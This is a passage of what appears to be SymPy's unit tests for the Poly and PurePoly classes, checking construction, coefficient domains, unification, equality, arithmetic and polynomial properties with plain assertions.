assert Poly.from_poly(f, gens=x, domain=ZZ).rep == DMP([1, 7], ZZ)
assert Poly.from_poly(f, gens=x, domain=QQ).rep == DMP([1, 7], QQ)
assert Poly.from_poly(f, gens=y) == Poly(x + 7, y, domain='ZZ[x]')
raises(CoercionFailed, lambda: Poly.from_poly(f, gens=y, domain=K))
raises(CoercionFailed, lambda: Poly.from_poly(f, gens=y, domain=ZZ))
raises(CoercionFailed, lambda: Poly.from_poly(f, gens=y, domain=QQ))
assert Poly.from_poly(f, gens=(x, y)) == Poly(x + 7, x, y, domain='ZZ')
assert Poly.from_poly(
f, gens=(x, y), domain=ZZ) == Poly(x + 7, x, y, domain='ZZ')
assert Poly.from_poly(
f, gens=(x, y), domain=QQ) == Poly(x + 7, x, y, domain='QQ')
assert Poly.from_poly(
f, gens=(x, y), modulus=3) == Poly(x + 7, x, y, domain='FF(3)')
K = FF(2)
assert Poly.from_poly(g) == g
assert Poly.from_poly(g, domain=ZZ).rep == DMP([1, -1], ZZ)
raises(CoercionFailed, lambda: Poly.from_poly(g, domain=QQ))
assert Poly.from_poly(g, domain=K).rep == DMP([K(1), K(0)], K)
assert Poly.from_poly(g, gens=x) == g
assert Poly.from_poly(g, gens=x, domain=ZZ).rep == DMP([1, -1], ZZ)
raises(CoercionFailed, lambda: Poly.from_poly(g, gens=x, domain=QQ))
assert Poly.from_poly(g, gens=x, domain=K).rep == DMP([K(1), K(0)], K)
K = FF(3)
assert Poly.from_poly(h) == h
assert Poly.from_poly(
h, domain=ZZ).rep == DMP([[ZZ(1)], [ZZ(1), ZZ(0)]], ZZ)
assert Poly.from_poly(
h, domain=QQ).rep == DMP([[QQ(1)], [QQ(1), QQ(0)]], QQ)
assert Poly.from_poly(h, domain=K).rep == DMP([[K(1)], [K(1), K(0)]], K)
assert Poly.from_poly(h, gens=x) == Poly(x + y, x, domain=ZZ[y])
raises(CoercionFailed, lambda: Poly.from_poly(h, gens=x, domain=ZZ))
assert Poly.from_poly(
h, gens=x, domain=ZZ[y]) == Poly(x + y, x, domain=ZZ[y])
raises(CoercionFailed, lambda: Poly.from_poly(h, gens=x, domain=QQ))
assert Poly.from_poly(
h, gens=x, domain=QQ[y]) == Poly(x + y, x, domain=QQ[y])
raises(CoercionFailed, lambda: Poly.from_poly(h, gens=x, modulus=3))
assert Poly.from_poly(h, gens=y) == Poly(x + y, y, domain=ZZ[x])
raises(CoercionFailed, lambda: Poly.from_poly(h, gens=y, domain=ZZ))
assert Poly.from_poly(
h, gens=y, domain=ZZ[x]) == Poly(x + y, y, domain=ZZ[x])
raises(CoercionFailed, lambda: Poly.from_poly(h, gens=y, domain=QQ))
assert Poly.from_poly(
h, gens=y, domain=QQ[x]) == Poly(x + y, y, domain=QQ[x])
raises(CoercionFailed, lambda: Poly.from_poly(h, gens=y, modulus=3))
assert Poly.from_poly(h, gens=(x, y)) == h
assert Poly.from_poly(
h, gens=(x, y), domain=ZZ).rep == DMP([[ZZ(1)], [ZZ(1), ZZ(0)]], ZZ)
assert Poly.from_poly(
h, gens=(x, y), domain=QQ).rep == DMP([[QQ(1)], [QQ(1), QQ(0)]], QQ)
assert Poly.from_poly(
h, gens=(x, y), domain=K).rep == DMP([[K(1)], [K(1), K(0)]], K)
assert Poly.from_poly(
h, gens=(y, x)).rep == DMP([[ZZ(1)], [ZZ(1), ZZ(0)]], ZZ)
assert Poly.from_poly(
h, gens=(y, x), domain=ZZ).rep == DMP([[ZZ(1)], [ZZ(1), ZZ(0)]], ZZ)
assert Poly.from_poly(
h, gens=(y, x), domain=QQ).rep == DMP([[QQ(1)], [QQ(1), QQ(0)]], QQ)
assert Poly.from_poly(
h, gens=(y, x), domain=K).rep == DMP([[K(1)], [K(1), K(0)]], K)
assert Poly.from_poly(
h, gens=(x, y), field=True).rep == DMP([[QQ(1)], [QQ(1), QQ(0)]], QQ)
assert Poly.from_poly(
h, gens=(x, y), field=True).rep == DMP([[QQ(1)], [QQ(1), QQ(0)]], QQ)
def test_Poly_from_expr():
raises(GeneratorsNeeded, lambda: Poly.from_expr(S(0)))
raises(GeneratorsNeeded, lambda: Poly.from_expr(S(7)))
F3 = FF(3)
assert Poly.from_expr(x + 5, domain=F3).rep == DMP([F3(1), F3(2)], F3)
assert Poly.from_expr(y + 5, domain=F3).rep == DMP([F3(1), F3(2)], F3)
assert Poly.from_expr(x + 5, x, domain=F3).rep == DMP([F3(1), F3(2)], F3)
assert Poly.from_expr(y + 5, y, domain=F3).rep == DMP([F3(1), F3(2)], F3)
assert Poly.from_expr(x + y, domain=F3).rep == DMP([[F3(1)], [F3(1), F3(0)]], F3)
assert Poly.from_expr(x + y, x, y, domain=F3).rep == DMP([[F3(1)], [F3(1), F3(0)]], F3)
assert Poly.from_expr(x + 5).rep == DMP([1, 5], ZZ)
assert Poly.from_expr(y + 5).rep == DMP([1, 5], ZZ)
assert Poly.from_expr(x + 5, x).rep == DMP([1, 5], ZZ)
assert Poly.from_expr(y + 5, y).rep == DMP([1, 5], ZZ)
assert Poly.from_expr(x + 5, domain=ZZ).rep == DMP([1, 5], ZZ)
assert Poly.from_expr(y + 5, domain=ZZ).rep == DMP([1, 5], ZZ)
assert Poly.from_expr(x + 5, x, domain=ZZ).rep == DMP([1, 5], ZZ)
assert Poly.from_expr(y + 5, y, domain=ZZ).rep == DMP([1, 5], ZZ)
assert Poly.from_expr(x + 5, x, y, domain=ZZ).rep == DMP([[1], [5]], ZZ)
assert Poly.from_expr(y + 5, x, y, domain=ZZ).rep == DMP([[1, 5]], ZZ)
def test_Poly__new__():
raises(GeneratorsError, lambda: Poly(x + 1, x, x))
raises(GeneratorsError, lambda: Poly(x + y, x, y, domain=ZZ[x]))
raises(GeneratorsError, lambda: Poly(x + y, x, y, domain=ZZ[y]))
raises(OptionError, lambda: Poly(x, x, symmetric=True))
raises(OptionError, lambda: Poly(x + 2, x, modulus=3, domain=QQ))
raises(OptionError, lambda: Poly(x + 2, x, domain=ZZ, gaussian=True))
raises(OptionError, lambda: Poly(x + 2, x, modulus=3, gaussian=True))
raises(OptionError, lambda: Poly(x + 2, x, domain=ZZ, extension=[sqrt(3)]))
raises(OptionError, lambda: Poly(x + 2, x, modulus=3, extension=[sqrt(3)]))
raises(OptionError, lambda: Poly(x + 2, x, domain=ZZ, extension=True))
raises(OptionError, lambda: Poly(x + 2, x, modulus=3, extension=True))
raises(OptionError, lambda: Poly(x + 2, x, domain=ZZ, greedy=True))
raises(OptionError, lambda: Poly(x + 2, x, domain=QQ, field=True))
raises(OptionError, lambda: Poly(x + 2, x, domain=ZZ, greedy=False))
raises(OptionError, lambda: Poly(x + 2, x, domain=QQ, field=False))
raises(NotImplementedError, lambda: Poly(x + 1, x, modulus=3, order='grlex'))
raises(NotImplementedError, lambda: Poly(x + 1, x, order='grlex'))
raises(GeneratorsNeeded, lambda: Poly({1: 2, 0: 1}))
raises(GeneratorsNeeded, lambda: Poly([2, 1]))
raises(GeneratorsNeeded, lambda: Poly((2, 1)))
raises(GeneratorsNeeded, lambda: Poly(1))
f = a*x**2 + b*x + c
assert Poly({2: a, 1: b, 0: c}, x) == f
assert Poly(iter([a, b, c]), x) == f
assert Poly([a, b, c], x) == f
assert Poly((a, b, c), x) == f
f = Poly({}, x, y, z)
assert f.gens == (x, y, z) and f.as_expr() == 0
assert Poly(Poly(a*x + b*y, x, y), x) == Poly(a*x + b*y, x)
assert Poly(3*x**2 + 2*x + 1, domain='ZZ').all_coeffs() == [3, 2, 1]
assert Poly(3*x**2 + 2*x + 1, domain='QQ').all_coeffs() == [3, 2, 1]
assert Poly(3*x**2 + 2*x + 1, domain='RR').all_coeffs() == [3.0, 2.0, 1.0]
raises(CoercionFailed, lambda: Poly(3*x**2/5 + 2*x/5 + 1, domain='ZZ'))
assert Poly(
3*x**2/5 + 2*x/5 + 1, domain='QQ').all_coeffs() == [S(3)/5, S(2)/5, 1]
assert _epsilon_eq(
Poly(3*x**2/5 + 2*x/5 + 1, domain='RR').all_coeffs(), [0.6, 0.4, 1.0])
assert Poly(3.0*x**2 + 2.0*x + 1, domain='ZZ').all_coeffs() == [3, 2, 1]
assert Poly(3.0*x**2 + 2.0*x + 1, domain='QQ').all_coeffs() == [3, 2, 1]
assert Poly(
3.0*x**2 + 2.0*x + 1, domain='RR').all_coeffs() == [3.0, 2.0, 1.0]
raises(CoercionFailed, lambda: Poly(3.1*x**2 + 2.1*x + 1, domain='ZZ'))
assert Poly(3.1*x**2 + 2.1*x + 1, domain='QQ').all_coeffs() == [S(31)/10, S(21)/10, 1]
assert Poly(3.1*x**2 + 2.1*x + 1, domain='RR').all_coeffs() == [3.1, 2.1, 1.0]
assert Poly({(2, 1): 1, (1, 2): 2, (1, 1): 3}, x, y) == \
Poly(x**2*y + 2*x*y**2 + 3*x*y, x, y)
assert Poly(x**2 + 1, extension=I).get_domain() == QQ.algebraic_field(I)
f = 3*x**5 - x**4 + x**3 - x** 2 + 65538
assert Poly(f, x, modulus=65537, symmetric=True) == \
Poly(3*x**5 - x**4 + x**3 - x** 2 + 1, x, modulus=65537,
symmetric=True)
assert Poly(f, x, modulus=65537, symmetric=False) == \
Poly(3*x**5 + 65536*x**4 + x**3 + 65536*x** 2 + 1, x,
modulus=65537, symmetric=False)
assert isinstance(Poly(x**2 + x + 1.0).get_domain(), RealField)
def test_Poly__args():
assert Poly(x**2 + 1).args == (x**2 + 1,)
def test_Poly__gens():
assert Poly((x - p)*(x - q), x).gens == (x,)
assert Poly((x - p)*(x - q), p).gens == (p,)
assert Poly((x - p)*(x - q), q).gens == (q,)
assert Poly((x - p)*(x - q), x, p).gens == (x, p)
assert Poly((x - p)*(x - q), x, q).gens == (x, q)
assert Poly((x - p)*(x - q), x, p, q).gens == (x, p, q)
assert Poly((x - p)*(x - q), p, x, q).gens == (p, x, q)
assert Poly((x - p)*(x - q), p, q, x).gens == (p, q, x)
assert Poly((x - p)*(x - q)).gens == (x, p, q)
assert Poly((x - p)*(x - q), sort='x > p > q').gens == (x, p, q)
assert Poly((x - p)*(x - q), sort='p > x > q').gens == (p, x, q)
assert Poly((x - p)*(x - q), sort='p > q > x').gens == (p, q, x)
assert Poly((x - p)*(x - q), x, p, q, sort='p > q > x').gens == (x, p, q)
assert Poly((x - p)*(x - q), wrt='x').gens == (x, p, q)
assert Poly((x - p)*(x - q), wrt='p').gens == (p, x, q)
assert Poly((x - p)*(x - q), wrt='q').gens == (q, x, p)
assert Poly((x - p)*(x - q), wrt=x).gens == (x, p, q)
assert Poly((x - p)*(x - q), wrt=p).gens == (p, x, q)
assert Poly((x - p)*(x - q), wrt=q).gens == (q, x, p)
assert Poly((x - p)*(x - q), x, p, q, wrt='p').gens == (x, p, q)
assert Poly((x - p)*(x - q), wrt='p', sort='q > x').gens == (p, q, x)
assert Poly((x - p)*(x - q), wrt='q', sort='p > x').gens == (q, p, x)
def test_Poly_zero():
assert Poly(x).zero == Poly(0, x, domain=ZZ)
assert Poly(x/2).zero == Poly(0, x, domain=QQ)
def test_Poly_one():
assert Poly(x).one == Poly(1, x, domain=ZZ)
assert Poly(x/2).one == Poly(1, x, domain=QQ)
def test_Poly__unify():
raises(UnificationFailed, lambda: Poly(x)._unify(y))
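    # _unify returns (dom, per, F, G); the [2:] slices below compare only the
    # unified low-level DMP representations.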
F3 = FF(3)
F5 = FF(5)
assert Poly(x, x, modulus=3)._unify(Poly(y, y, modulus=3))[2:] == (
DMP([[F3(1)], []], F3), DMP([[F3(1), F3(0)]], F3))
assert Poly(x, x, modulus=3)._unify(Poly(y, y, modulus=5))[2:] == (
DMP([[F5(1)], []], F5), DMP([[F5(1), F5(0)]], F5))
assert Poly(y, x, y)._unify(Poly(x, x, modulus=3))[2:] == (DMP([[F3(1), F3(0)]], F3), DMP([[F3(1)], []], F3))
assert Poly(x, x, modulus=3)._unify(Poly(y, x, y))[2:] == (DMP([[F3(1)], []], F3), DMP([[F3(1), F3(0)]], F3))
assert Poly(x + 1, x)._unify(Poly(x + 2, x))[2:] == (DMP([1, 1], ZZ), DMP([1, 2], ZZ))
assert Poly(x + 1, x, domain='QQ')._unify(Poly(x + 2, x))[2:] == (DMP([1, 1], QQ), DMP([1, 2], QQ))
assert Poly(x + 1, x)._unify(Poly(x + 2, x, domain='QQ'))[2:] == (DMP([1, 1], QQ), DMP([1, 2], QQ))
assert Poly(x + 1, x)._unify(Poly(x + 2, x, y))[2:] == (DMP([[1], [1]], ZZ), DMP([[1], [2]], ZZ))
assert Poly(x + 1, x, domain='QQ')._unify(Poly(x + 2, x, y))[2:] == (DMP([[1], [1]], QQ), DMP([[1], [2]], QQ))
assert Poly(x + 1, x)._unify(Poly(x + 2, x, y, domain='QQ'))[2:] == (DMP([[1], [1]], QQ), DMP([[1], [2]], QQ))
assert Poly(x + 1, x, y)._unify(Poly(x + 2, x))[2:] == (DMP([[1], [1]], ZZ), DMP([[1], [2]], ZZ))
assert Poly(x + 1, x, y, domain='QQ')._unify(Poly(x + 2, x))[2:] == (DMP([[1], [1]], QQ), DMP([[1], [2]], QQ))
assert Poly(x + 1, x, y)._unify(Poly(x + 2, x, domain='QQ'))[2:] == (DMP([[1], [1]], QQ), DMP([[1], [2]], QQ))
assert Poly(x + 1, x, y)._unify(Poly(x + 2, x, y))[2:] == (DMP([[1], [1]], ZZ), DMP([[1], [2]], ZZ))
assert Poly(x + 1, x, y, domain='QQ')._unify(Poly(x + 2, x, y))[2:] == (DMP([[1], [1]], QQ), DMP([[1], [2]], QQ))
assert Poly(x + 1, x, y)._unify(Poly(x + 2, x, y, domain='QQ'))[2:] == (DMP([[1], [1]], QQ), DMP([[1], [2]], QQ))
assert Poly(x + 1, x)._unify(Poly(x + 2, y, x))[2:] == (DMP([[1, 1]], ZZ), DMP([[1, 2]], ZZ))
assert Poly(x + 1, x, domain='QQ')._unify(Poly(x + 2, y, x))[2:] == (DMP([[1, 1]], QQ), DMP([[1, 2]], QQ))
assert Poly(x + 1, x)._unify(Poly(x + 2, y, x, domain='QQ'))[2:] == (DMP([[1, 1]], QQ), DMP([[1, 2]], QQ))
assert Poly(x + 1, y, x)._unify(Poly(x + 2, x))[2:] == (DMP([[1, 1]], ZZ), DMP([[1, 2]], ZZ))
assert Poly(x + 1, y, x, domain='QQ')._unify(Poly(x + 2, x))[2:] == (DMP([[1, 1]], QQ), DMP([[1, 2]], QQ))
assert Poly(x + 1, y, x)._unify(Poly(x + 2, x, domain='QQ'))[2:] == (DMP([[1, 1]], QQ), DMP([[1, 2]], QQ))
assert Poly(x + 1, x, y)._unify(Poly(x + 2, y, x))[2:] == (DMP([[1], [1]], ZZ), DMP([[1], [2]], ZZ))
assert Poly(x + 1, x, y, domain='QQ')._unify(Poly(x + 2, y, x))[2:] == (DMP([[1], [1]], QQ), DMP([[1], [2]], QQ))
assert Poly(x + 1, x, y)._unify(Poly(x + 2, y, x, domain='QQ'))[2:] == (DMP([[1], [1]], QQ), DMP([[1], [2]], QQ))
assert Poly(x + 1, y, x)._unify(Poly(x + 2, x, y))[2:] == (DMP([[1, 1]], ZZ), DMP([[1, 2]], ZZ))
assert Poly(x + 1, y, x, domain='QQ')._unify(Poly(x + 2, x, y))[2:] == (DMP([[1, 1]], QQ), DMP([[1, 2]], QQ))
assert Poly(x + 1, y, x)._unify(Poly(x + 2, x, y, domain='QQ'))[2:] == (DMP([[1, 1]], QQ), DMP([[1, 2]], QQ))
F, A, B = field("a,b", ZZ)
assert Poly(a*x, x, domain='ZZ[a]')._unify(Poly(a*b*x, x, domain='ZZ(a,b)'))[2:] == \
(DMP([A, F(0)], F.to_domain()), DMP([A*B, F(0)], F.to_domain()))
assert Poly(a*x, x, domain='ZZ(a)')._unify(Poly(a*b*x, x, domain='ZZ(a,b)'))[2:] == \
(DMP([A, F(0)], F.to_domain()), DMP([A*B, F(0)], F.to_domain()))
raises(CoercionFailed, lambda: Poly(Poly(x**2 + x**2*z, y, field=True), domain='ZZ(x)'))
f = Poly(t**2 + t/3 + x, t, domain='QQ(x)')
g = Poly(t**2 + t/3 + x, t, domain='QQ[x]')
assert f._unify(g)[2:] == (f.rep, f.rep)
def test_Poly_free_symbols():
assert Poly(x**2 + 1).free_symbols == set([x])
assert Poly(x**2 + y*z).free_symbols == set([x, y, z])
assert Poly(x**2 + y*z, x).free_symbols == set([x, y, z])
assert Poly(x**2 + sin(y*z)).free_symbols == set([x, y, z])
assert Poly(x**2 + sin(y*z), x).free_symbols == set([x, y, z])
assert Poly(x**2 + sin(y*z), x, domain=EX).free_symbols == set([x, y, z])
def test_PurePoly_free_symbols():
assert PurePoly(x**2 + 1).free_symbols == set([])
assert PurePoly(x**2 + y*z).free_symbols == set([])
assert PurePoly(x**2 + y*z, x).free_symbols == set([y, z])
assert PurePoly(x**2 + sin(y*z)).free_symbols == set([])
assert PurePoly(x**2 + sin(y*z), x).free_symbols == set([y, z])
assert PurePoly(x**2 + sin(y*z), x, domain=EX).free_symbols == set([y, z])
def test_Poly__eq__():
assert (Poly(x, x) == Poly(x, x)) is True
assert (Poly(x, x, domain=QQ) == Poly(x, x)) is True
assert (Poly(x, x) == Poly(x, x, domain=QQ)) is True
assert (Poly(x, x, domain=ZZ[a]) == Poly(x, x)) is True
assert (Poly(x, x) == Poly(x, x, domain=ZZ[a])) is True
assert (Poly(x*y, x, y) == Poly(x, x)) is False
assert (Poly(x, x, y) == Poly(x, x)) is False
assert (Poly(x, x) == Poly(x, x, y)) is False
assert (Poly(x**2 + 1, x) == Poly(y**2 + 1, y)) is False
assert (Poly(y**2 + 1, y) == Poly(x**2 + 1, x)) is False
f = Poly(x, x, domain=ZZ)
g = Poly(x, x, domain=QQ)
assert f.eq(g) is True
assert f.ne(g) is False
assert f.eq(g, strict=True) is False
assert f.ne(g, strict=True) is True
t0 = Symbol('t0')
f = Poly((t0/2 + x**2)*t**2 - x**2*t, t, domain='QQ[x,t0]')
g = Poly((t0/2 + x**2)*t**2 - x**2*t, t, domain='ZZ(x,t0)')
assert (f == g) is True
def test_PurePoly__eq__():
assert (PurePoly(x, x) == PurePoly(x, x)) is True
assert (PurePoly(x, x, domain=QQ) == PurePoly(x, x)) is True
assert (PurePoly(x, x) == PurePoly(x, x, domain=QQ)) is True
assert (PurePoly(x, x, domain=ZZ[a]) == PurePoly(x, x)) is True
assert (PurePoly(x, x) == PurePoly(x, x, domain=ZZ[a])) is True
assert (PurePoly(x*y, x, y) == PurePoly(x, x)) is False
assert (PurePoly(x, x, y) == PurePoly(x, x)) is False
assert (PurePoly(x, x) == PurePoly(x, x, y)) is False
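    # Unlike Poly, PurePoly compares structurally and ignores generator names.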
assert (PurePoly(x**2 + 1, x) == PurePoly(y**2 + 1, y)) is True
assert (PurePoly(y**2 + 1, y) == PurePoly(x**2 + 1, x)) is True
f = PurePoly(x, x, domain=ZZ)
g = PurePoly(x, x, domain=QQ)
assert f.eq(g) is True
assert f.ne(g) is False
assert f.eq(g, strict=True) is False
assert f.ne(g, strict=True) is True
f = PurePoly(x, x, domain=ZZ)
g = PurePoly(y, y, domain=QQ)
assert f.eq(g) is True
assert f.ne(g) is False
assert f.eq(g, strict=True) is False
assert f.ne(g, strict=True) is True
def test_PurePoly_Poly():
assert isinstance(PurePoly(Poly(x**2 + 1)), PurePoly) is True
assert isinstance(Poly(PurePoly(x**2 + 1)), Poly) is True
def test_Poly_get_domain():
assert Poly(2*x).get_domain() == ZZ
assert Poly(2*x, domain='ZZ').get_domain() == ZZ
assert Poly(2*x, domain='QQ').get_domain() == QQ
assert Poly(x/2).get_domain() == QQ
raises(CoercionFailed, lambda: Poly(x/2, domain='ZZ'))
assert Poly(x/2, domain='QQ').get_domain() == QQ
assert isinstance(Poly(0.2*x).get_domain(), RealField)
def test_Poly_set_domain():
assert Poly(2*x + 1).set_domain(ZZ) == Poly(2*x + 1)
assert Poly(2*x + 1).set_domain('ZZ') == Poly(2*x + 1)
assert Poly(2*x + 1).set_domain(QQ) == Poly(2*x + 1, domain='QQ')
assert Poly(2*x + 1).set_domain('QQ') == Poly(2*x + 1, domain='QQ')
assert Poly(S(2)/10*x + S(1)/10).set_domain('RR') == Poly(0.2*x + 0.1)
assert Poly(0.2*x + 0.1).set_domain('QQ') == Poly(S(2)/10*x + S(1)/10)
raises(CoercionFailed, lambda: Poly(x/2 + 1).set_domain(ZZ))
raises(CoercionFailed, lambda: Poly(x + 1, modulus=2).set_domain(QQ))
raises(GeneratorsError, lambda: Poly(x*y, x, y).set_domain(ZZ[y]))
def test_Poly_get_modulus():
assert Poly(x**2 + 1, modulus=2).get_modulus() == 2
raises(PolynomialError, lambda: Poly(x**2 + 1).get_modulus())
def test_Poly_set_modulus():
assert Poly(
x**2 + 1, modulus=2).set_modulus(7) == Poly(x**2 + 1, modulus=7)
assert Poly(
x**2 + 5, modulus=7).set_modulus(2) == Poly(x**2 + 1, modulus=2)
assert Poly(x**2 + 1).set_modulus(2) == Poly(x**2 + 1, modulus=2)
raises(CoercionFailed, lambda: Poly(x/2 + 1).set_modulus(2))
def test_Poly_add_ground():
assert Poly(x + 1).add_ground(2) == Poly(x + 3)
def test_Poly_sub_ground():
assert Poly(x + 1).sub_ground(2) == Poly(x - 1)
def test_Poly_mul_ground():
assert Poly(x + 1).mul_ground(2) == Poly(2*x + 2)
def test_Poly_quo_ground():
assert Poly(2*x + 4).quo_ground(2) == Poly(x + 2)
assert Poly(2*x + 3).quo_ground(2) == Poly(x + 1)
def test_Poly_exquo_ground():
assert Poly(2*x + 4).exquo_ground(2) == Poly(x + 2)
raises(ExactQuotientFailed, lambda: Poly(2*x + 3).exquo_ground(2))
def test_Poly_abs():
assert Poly(-x + 1, x).abs() == abs(Poly(-x + 1, x)) == Poly(x + 1, x)
def test_Poly_neg():
assert Poly(-x + 1, x).neg() == -Poly(-x + 1, x) == Poly(x - 1, x)
def test_Poly_add():
assert Poly(0, x).add(Poly(0, x)) == Poly(0, x)
assert Poly(0, x) + Poly(0, x) == Poly(0, x)
assert Poly(1, x).add(Poly(0, x)) == Poly(1, x)
assert Poly(1, x, y) + Poly(0, x) == Poly(1, x, y)
assert Poly(0, x).add(Poly(1, x, y)) == Poly(1, x, y)
assert Poly(0, x, y) + Poly(1, x, y) == Poly(1, x, y)
assert Poly(1, x) + x == Poly(x + 1, x)
assert Poly(1, x) + sin(x) == 1 + sin(x)
assert Poly(x, x) + 1 == Poly(x + 1, x)
assert 1 + Poly(x, x) == Poly(x + 1, x)
def test_Poly_sub():
assert Poly(0, x).sub(Poly(0, x)) == Poly(0, x)
assert Poly(0, x) - Poly(0, x) == Poly(0, x)
assert Poly(1, x).sub(Poly(0, x)) == Poly(1, x)
assert Poly(1, x, y) - Poly(0, x) == Poly(1, x, y)
assert Poly(0, x).sub(Poly(1, x, y)) == Poly(-1, x, y)
assert Poly(0, x, y) - Poly(1, x, y) == Poly(-1, x, y)
assert Poly(1, x) - x == Poly(1 - x, x)
assert Poly(1, x) - sin(x) == 1 - sin(x)
assert Poly(x, x) - 1 == Poly(x - 1, x)
assert 1 - Poly(x, x) == Poly(1 - x, x)
def test_Poly_mul():
assert Poly(0, x).mul(Poly(0, x)) == Poly(0, x)
assert Poly(0, x) * Poly(0, x) == Poly(0, x)
assert Poly(2, x).mul(Poly(4, x)) == Poly(8, x)
assert Poly(2, x, y) * Poly(4, x) == Poly(8, x, y)
assert Poly(4, x).mul(Poly(2, x, y)) == Poly(8, x, y)
assert Poly(4, x, y) * Poly(2, x, y) == Poly(8, x, y)
assert Poly(1, x) * x == Poly(x, x)
assert Poly(1, x) * sin(x) == sin(x)
assert Poly(x, x) * 2 == Poly(2*x, x)
assert 2 * Poly(x, x) == Poly(2*x, x)
def test_Poly_sqr():
assert Poly(x*y, x, y).sqr() == Poly(x**2*y**2, x, y)
def test_Poly_pow():
assert Poly(x, x).pow(10) == Poly(x**10, x)
assert Poly(x, x).pow(Integer(10)) == Poly(x**10, x)
assert Poly(2*y, x, y).pow(4) == Poly(16*y**4, x, y)
assert Poly(2*y, x, y).pow(Integer(4)) == Poly(16*y**4, x, y)
assert Poly(7*x*y, x, y)**3 == Poly(343*x**3*y**3, x, y)
assert Poly(x*y + 1, x, y)**(-1) == (x*y + 1)**(-1)
assert Poly(x*y + 1, x, y)**x == (x*y + 1)**x
def test_Poly_divmod():
f, g = Poly(x**2), Poly(x)
q, r = g, Poly(0, x)
assert divmod(f, g) == (q, r)
assert f // g == q
assert f % g == r
assert divmod(f, x) == (q, r)
assert f // x == q
assert f % x == r
q, r = Poly(0, x), Poly(2, x)
assert divmod(2, g) == (q, r)
assert 2 // g == q
assert 2 % g == r
assert Poly(x)/Poly(x) == 1
assert Poly(x**2)/Poly(x) == x
assert Poly(x)/Poly(x**2) == 1/x
def test_Poly_eq_ne():
assert (Poly(x + y, x, y) == Poly(x + y, x, y)) is True
assert (Poly(x + y, x) == Poly(x + y, x, y)) is False
assert (Poly(x + y, x, y) == Poly(x + y, x)) is False
assert (Poly(x + y, x) == Poly(x + y, x)) is True
assert (Poly(x + y, y) == Poly(x + y, y)) is True
assert (Poly(x + y, x, y) == x + y) is True
assert (Poly(x + y, x) == x + y) is True
assert (Poly(x + y, x, y) == x + y) is True
assert (Poly(x + y, x) == x + y) is True
assert (Poly(x + y, y) == x + y) is True
assert (Poly(x + y, x, y) != Poly(x + y, x, y)) is False
assert (Poly(x + y, x) != Poly(x + y, x, y)) is True
assert (Poly(x + y, x, y) != Poly(x + y, x)) is True
assert (Poly(x + y, x) != Poly(x + y, x)) is False
assert (Poly(x + y, y) != Poly(x + y, y)) is False
assert (Poly(x + y, x, y) != x + y) is False
assert (Poly(x + y, x) != x + y) is False
assert (Poly(x + y, x, y) != x + y) is False
assert (Poly(x + y, x) != x + y) is False
assert (Poly(x + y, y) != x + y) is False
assert (Poly(x, x) == sin(x)) is False
assert (Poly(x, x) != sin(x)) is True
def test_Poly_nonzero():
assert not bool(Poly(0, x)) is True
assert not bool(Poly(1, x)) is False
def test_Poly_properties():
assert Poly(0, x).is_zero is True
assert Poly(1, x).is_zero is False
assert Poly(1, x).is_one is True
assert Poly(2, x).is_one is False
assert Poly(x - 1, x).is_sqf is True
assert Poly((x - 1)**2, x).is_sqf is False
assert Poly(x - 1, x).is_monic is True
assert Poly(2*x - 1, x).is_monic is False
assert Poly(3*x + 2, x).is_primitive is True
assert Poly(4*x + 2, x).is_primitive is False
assert Poly(1, x).is_ground is True
assert Poly(x, x).is_ground is False
assert Poly(x + y + z + 1).is_linear is True
assert Poly(x*y*z + 1).is_linear is False
assert Poly(x*y + z + 1).is_quadratic is True
assert Poly(x*y*z + 1).is_quadratic is False
assert Poly(x*y).is_monomial is True
assert Poly(x*y + 1).is_monomial is False
assert Poly(x**2 + x*y).is_homogeneous is True
assert Poly(x**3 + x*y).is_homogeneous is False
assert Poly(x).is_univariate is True
assert Poly(x*y).is_univariate is False
assert Poly(x*y).is_multivariate is True
assert Poly(x).is_multivariate is False
assert Poly(
x**16 + x**14 - x**10 + x**8 - x**6 + x**2 + 1).is_cyclotomic is False
assert Poly(
x**16 + x**14 - x**10 - x**8 - x**6 + x**2 + 1).is_cyclotomic is True
def test_Poly_is_irreducible():
assert Poly(x**2 + x + 1).is_irreducible is True
assert Poly(x**2 + 2*x + 1).is_irreducible is False
assert Poly(7*x + 3, modulus=11).is_irreducible is True
assert Poly(7*x**2 + 3*x + 1, modulus=11).is_irreducible is False
def test_Poly_subs():
assert Poly(x + 1).subs(x, 0) == 1
assert Poly(x + 1).subs(x, x) == Poly(x + 1)
assert Poly(x + 1).subs(x, y) == Poly(y + 1)
assert Poly(x*y, x).subs(y, x) == x**2
assert Poly(x*y, x).subs(x, y) == y**2
def test_Poly_replace():
assert Poly(x + 1).replace(x) == Poly(x + 1)
assert Poly(x + 1).replace(y) == Poly(y + 1)
raises(PolynomialError, lambda: Poly(x + y).replace(z))
assert Poly(x + 1).replace(x, x) == Poly(x + 1)
assert Poly(x + 1).replace(x, y) == Poly(y + 1)
assert Poly(x + y).replace(x, x) == Poly(x + y)
assert Poly(x + y).replace(x, z) == Poly(z + y, z, y)
assert Poly(x + y).replace(y, y) == Poly(x + y)
assert Poly(x + y).replace(y, z) == Poly(x + z, x, z)
raises(PolynomialError, lambda: Poly(x + y).replace(x, y))
raises(PolynomialError, lambda: Poly(x + y).replace(z, t))
assert Poly(x + y, x).replace(x, z) == Poly(z + y, z)
assert Poly(x + y, y).replace(y, z) == Poly(x + z, z)
raises(PolynomialError, lambda: Poly(x + y, x).replace(x, y))
raises(PolynomialError, lambda: Poly(x + y, y).replace(y, x))
def test_Poly_reorder():
raises(PolynomialError, lambda: Poly(x + y).reorder(x, z))
assert Poly(x + y, x, y).reorder(x, y) == Poly(x + y, x, y)
assert Poly(x + y, x, y).reorder(y, x) == Poly(x + y, y, x)
assert Poly(x + y, y, x).reorder(x, y) == Poly(x + y, x, y)
assert Poly(x + y, y, x).reorder(y, x) == Poly(x + y, y, x)
assert Poly(x + y, x, y).reorder(wrt=x) == Poly(x + y, x, y)
assert Poly(x + y, x, y).reorder(wrt=y) == Poly(x + y, y, x)
def test_Poly_ltrim():
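    # ltrim(y) drops the generators preceding y, which must not occur in the polynomial.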
f = Poly(y**2 + y*z**2, x, y, z).ltrim(y)
assert f.as_expr() == y**2 + y*z**2 and f.gens == (y, z)
raises(PolynomialError, lambda: Poly(x*y**2 + y**2, x, y).ltrim(y))
def test_Poly_has_only_gens():
assert Poly(x*y + 1, x, y, z).has_only_gens(x, y) is True
assert Poly(x*y + z, x, y, z).has_only_gens(x, y) is False
raises(GeneratorsError, lambda: Poly(x*y**2 + y**2, x, y).has_only_gens(t))
def test_Poly_to_ring():
